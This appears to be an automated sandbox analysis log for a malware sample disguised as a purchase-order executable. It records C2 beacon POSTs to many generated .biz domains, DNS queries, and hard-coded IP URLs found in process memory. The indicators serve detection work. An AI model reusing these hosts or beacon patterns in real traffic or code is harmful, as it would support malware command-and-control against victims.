Source: global traffic	HTTP traffic detected: POST /iegvnj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wifbvlyjhbbms HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xkjclmaphxfk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nehgmgtqoyslwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mdsdns HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rexfjdt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ryotcjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nwopgtruvkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /awknmdgilg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sidemxclaeqjek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /clgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lbvkwwnpmntaxcl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /iaqpbajpgrrgeab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dpptvlnf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kfrhjclimdoqr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /oefmmmgpghmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /walyoyypsnq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ihvmkpdsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004722EE

Source: global traffic	HTTP traffic detected: GET /vi?usid=25&utid=9811636311 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /poihsqpaasbgdl?usid=25&utid=9811652355 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz

Source: unknown

HTTP traffic detected: POST /g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 25 Mar 2025 17:22:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 25 Mar 2025 17:22:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 25 Mar 2025 17:22:36 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 25 Mar 2025 17:22:37 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag

Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394576368.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/
Source: alg.exe, 00000003.00000003.1351399233.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1341584430.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1995457727.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1782389022.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1775425507.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/U
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/al
Source: alg.exe, 00000003.00000003.1292422289.00000000004AD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1312101543.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1290392743.00000000004AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/cpfjcmisuekkT
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/l
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000002.1262521838.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000002.1262626782.0000000000B44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/liju
Source: exhilaratingly.exe, 00000004.00000002.1262521838.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/liju3
Source: alg.exe, 00000003.00000003.1290523546.000000000048F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/ngsp
Source: alg.exe, 00000003.00000003.1292383459.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1290392743.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/vL#o
Source: exhilaratingly.exe, 00000014.00000002.1395702171.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/vffaaftj
Source: alg.exe, 00000003.00000003.1290392743.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/cpfjcmisuekk
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/lijur
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/
Source: alg.exe, 00000003.00000003.1248416230.000000000048F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/0
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/2
Source: alg.exe, 00000003.00000003.1248416230.000000000048F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/P
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/d
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/eg
